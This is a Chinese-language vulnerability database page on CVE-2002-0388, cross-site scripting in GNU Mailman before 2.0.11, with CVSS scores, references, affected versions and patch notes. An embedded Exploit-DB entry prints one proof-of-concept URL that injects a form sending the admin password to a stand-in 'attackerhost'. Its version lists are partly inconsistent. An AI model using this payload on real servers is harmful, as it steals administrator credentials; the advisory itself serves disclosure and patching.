CVE-2002-0388
CVSS7.5
发布时间 :2002-06-18 00:00:00
修订时间 :2009-07-21 17:00:55
NMCOES    

[原文]Cross-site scripting vulnerabilities in Mailman before 2.0.11 allow remote attackers to execute script via (1) the admin login page, or (2) the Pipermail index summaries.


[CNNVD]GNU Mailman Pipermail Index Summary HTML注入漏洞(CNNVD-200206-050)

        Mailman before 2.0.11版本存在跨站脚本漏洞。远程攻击者借助1)admin登录页面,或者(2)Pipermail索引摘要执行脚本。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0388
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0388
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200206-050
(官方数据源) CNNVD

- 其它链接及资源

http://mail.python.org/pipermail/mailman-announce/2002-May/000042.html
(PATCH)  CONFIRM  http://mail.python.org/pipermail/mailman-announce/2002-May/000042.html
http://www.securityfocus.com/bid/4826
(UNKNOWN)  BID  4826

- 漏洞信息

GNU Mailman Pipermail Index Summary HTML注入漏洞
高危 跨站脚本
2002-06-18 00:00:00 2009-07-21 00:00:00
远程  
        Mailman before 2.0.11版本存在跨站脚本漏洞。远程攻击者借助1)admin登录页面,或者(2)Pipermail索引摘要执行脚本。

- 公告与补丁

        Debian has released an advisory which addresses this issue. See the attached advisory for details on obtaining fixes.
        Upgrades are available:
        GNU Mailman 2.0.1
        
        GNU Mailman 2.0.10
        
        GNU Mailman 2.0.2
        
        GNU Mailman 2.0.3
        
        GNU Mailman 2.0.4
        
        GNU Mailman 2.0.5
        
        GNU Mailman 2.0.6
        
        GNU Mailman 2.0.7
        
        GNU Mailman 2.0.8
        
        GNU Mailman 2.0.9
        

- 漏洞信息 (21480)

GNU Mailman 2.0.x Admin Login Cross-Site Scripting Vulnerability (EDBID:21480)
cgi webapps
2002-05-20 Verified
0 office
N/A [点击下载]
source: http://www.securityfocus.com/bid/4825/info

GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may construct a malicious link to the administrative login page, which contains arbitrary HTML and script code.

A user visiting the link will have the attacker's script code executed in their web browser in the context of the site running the vulnerable software. 

http://target/mailman_directory/admin/ml-name?adminpw="></form><form/action="http://attackerhost/attackerscript.cgi"/method="post"><br 		

- 漏洞信息

9281
Mailman Administrative Login Page XSS
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-05-24 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

GNU Mailman Pipermail Index Summary HTML Injection Vulnerability
Input Validation Error 4826
Yes No
2002-05-24 12:00:00 2009-07-12 05:56:00
Discovery of this issue is credited to Tristan Roddis.

- 受影响的程序版本

GNU Mailman 2.0.10
GNU Mailman 2.0.9
GNU Mailman 2.0.8
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
- RedHat PowerTools 7.1
- RedHat PowerTools 7.0
GNU Mailman 2.0.7
GNU Mailman 2.0.6
GNU Mailman 2.0.5
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- Debian Linux 2.2
- FreeBSD FreeBSD 4.3
- HP HP-UX 11.11
- HP HP-UX 11.0
- HP HP-UX 10.20
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- NetBSD NetBSD 1.5.2
- NetBSD NetBSD 1.5.1
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- RedHat Linux 7.1
- RedHat Linux 7.0
- S.u.S.E. Linux 7.2
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- Slackware Linux 8.0
- Slackware Linux 7.1
- Slackware Linux 7.0
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
GNU Mailman 2.0.4
GNU Mailman 2.0.3
GNU Mailman 2.0.2
GNU Mailman 2.0.1
GNU Mailman 2.0.11
+ Debian Linux 3.0

- 不受影响的程序版本

GNU Mailman 2.0.11
+ Debian Linux 3.0

- 漏洞讨论

HTML tags are not properly filtered from the HTML list archive index. This may enable a remote attacker to inject arbitrary HTML, including script code, into the HTML list archive index.

When a web user views the list index archive containing attacker-supplied script code, the script code will be executed in their web client in the security context of the website running GNU Mailman.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;.

- 解决方案

Debian has released an advisory which addresses this issue. See the attached advisory for details on obtaining fixes.

Upgrades are available:


GNU Mailman 2.0.1

GNU Mailman 2.0.10

GNU Mailman 2.0.2

GNU Mailman 2.0.3

GNU Mailman 2.0.4

GNU Mailman 2.0.5

GNU Mailman 2.0.6

GNU Mailman 2.0.7

GNU Mailman 2.0.8

GNU Mailman 2.0.9

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站